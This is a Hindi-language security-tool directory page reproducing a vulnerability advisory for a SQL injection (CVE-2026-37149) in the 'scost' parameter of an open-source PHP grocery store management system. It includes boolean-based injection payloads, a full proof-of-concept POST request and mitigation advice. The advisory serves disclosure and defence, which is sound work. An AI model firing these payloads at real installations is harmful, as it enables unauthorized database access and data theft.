Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-37149 — CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 के search_products.php में scost पैरामीटर में SQL इंजेक्शन भेद्यता | Kitploit
उपकरण/GitHubGitHub/pateldhyeyit/cve-2026-37149
भेद्यता विश्लेषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंगलर्निंग और शिक्षाडेटाबेस सुरक्षा
GitHubpateldhyeyit/cve-2026-37149

CVE-2026-37149

CVE-2026-37149 - GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 के search_products.php में scost पैरामीटर में SQL इंजेक्शन भेद्यता

रिपॉजिटरी देखें
283 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-37149 GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 में SQL इंजेक्शन

अवलोकन

CVE ID: CVE-2026-37149 भेद्यता प्रकार: SQL इंजेक्शन (CWE-89) गंभीरता: उच्च खोजकर्ता: Dhyey Patel

विवरण

GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN v1.0 में "/grocery/search_products.php" के "scost" पैरामीटर में SQL इंजेक्शन भेद्यता शामिल है।

एप्लिकेशन SQL क्वेरी में एम्बेड करने से पहले उपयोगकर्ता-आपूर्ति किए गए इनपुट को ठीक से मान्य नहीं करता है। एक हमलावर भेद्य पैरामीटर के माध्यम से क्राफ्टेड SQL एक्सप्रेशन इंजेक्ट कर सकता है और बैकएंड डेटाबेस क्वेरी में हेरफेर कर सकता है।

सफल शोषण से संवेदनशील डेटाबेस जानकारी तक अनधिकृत पहुंच और मनमाने SQL स्टेटमेंट्स के निष्पादन की अनुमति मिल सकती है।

प्रभावित उत्पाद

उत्पाद: GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN

संस्करण: v1.0

विक्रेता रिपॉजिटरी:

https://github.com/anirudhkannanvp/GROCERY-STORE-MANAGEMENT-SYSTEM-USING-PHP-AND-MYSQL-PHPMYADMIN-

प्रभावित घटक

  • "/grocery/search_products.php"
  • POST पैरामीटर: "scost"

हमले का प्रकार दूरस्थ

विक्रेता जानकारी रिपॉजिटरी स्वामी द्वारा अनुरक्षित ओपन-सोर्स प्रोजेक्ट: https://github.com/anirudhkannanvp

तकनीकी विवरण

भेद्यता की पुष्टि Boolean-आधारित SQL इंजेक्शन तकनीकों का उपयोग करके की गई।

TRUE कंडीशन पेलोड

-1 OR 321=6 AND 000483=000483 --

FALSE कंडीशन पेलोड

-1 OR 320=6 AND 000483=000483 --

इंजेक्ट की गई कंडीशन के TRUE या FALSE मूल्यांकन के आधार पर एप्लिकेशन की प्रतिक्रियाएँ भिन्न थीं, जिससे SQL इंजेक्शन की पुष्टि हुई।

आगे के परीक्षण से निम्नलिखित SQL फ़ंक्शनों के सफल निष्पादन की पुष्टि हुई:

SELECT database()

लौटाया गया डेटाबेस नाम था:

grocery

यह प्रदर्शित करता है कि भेद्य पैरामीटर के माध्यम से मनमाने SQL क्वेरी निष्पादित की जा सकती हैं।

प्रमाण की अवधारणा

अनुरोध

POST /grocery/search_products.php HTTP/1.1 Host: localhost X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded

scategory=1& scost=-1 OR 321=6 AND 000483=000483 -- & sitem_name=test& spid=1& submit=Search%20For%20products

परिणाम

इंजेक्ट की गई Boolean कंडीशन के अनुसार प्रतिक्रिया बदलती है, जो "scost" पैरामीटर में SQL इंजेक्शन की पुष्टि करती है।

प्रभाव

संभावित प्रभावों में शामिल हैं:

  • डेटाबेस एन्यूमरेशन
  • संवेदनशील जानकारी का खुलासा
  • प्रमाणीकरण बाईपास
  • डेटा निष्कर्षण
  • डेटाबेस रिकॉर्ड का संशोधन

शमन

डेवलपर्स को यह करना चाहिए:

  1. प्रीपेयर्ड स्टेटमेंट्स का उपयोग करें।
  2. पैरामीटराइज़्ड SQL क्वेरी का उपयोग करें।
  3. संख्यात्मक इनपुट पैरामीटर्स को मान्य करें।
  4. सर्वर-साइड इनपुट वैलिडेशन लागू करें।
  5. उपयोगकर्ता-नियंत्रित इनपुट को SQL स्टेटमेंट्स में सीधे संयोजित करने से बचें।

संदर्भ OWASP SQL इंजेक्शन https://owasp.org/www-community/attacks/SQL_Injection

MITRE CVE प्रोग्राम https://www.cve.org

श्रेय खोज एवं रिपोर्ट: Dhyey Patel

टूल डाउनलोड करें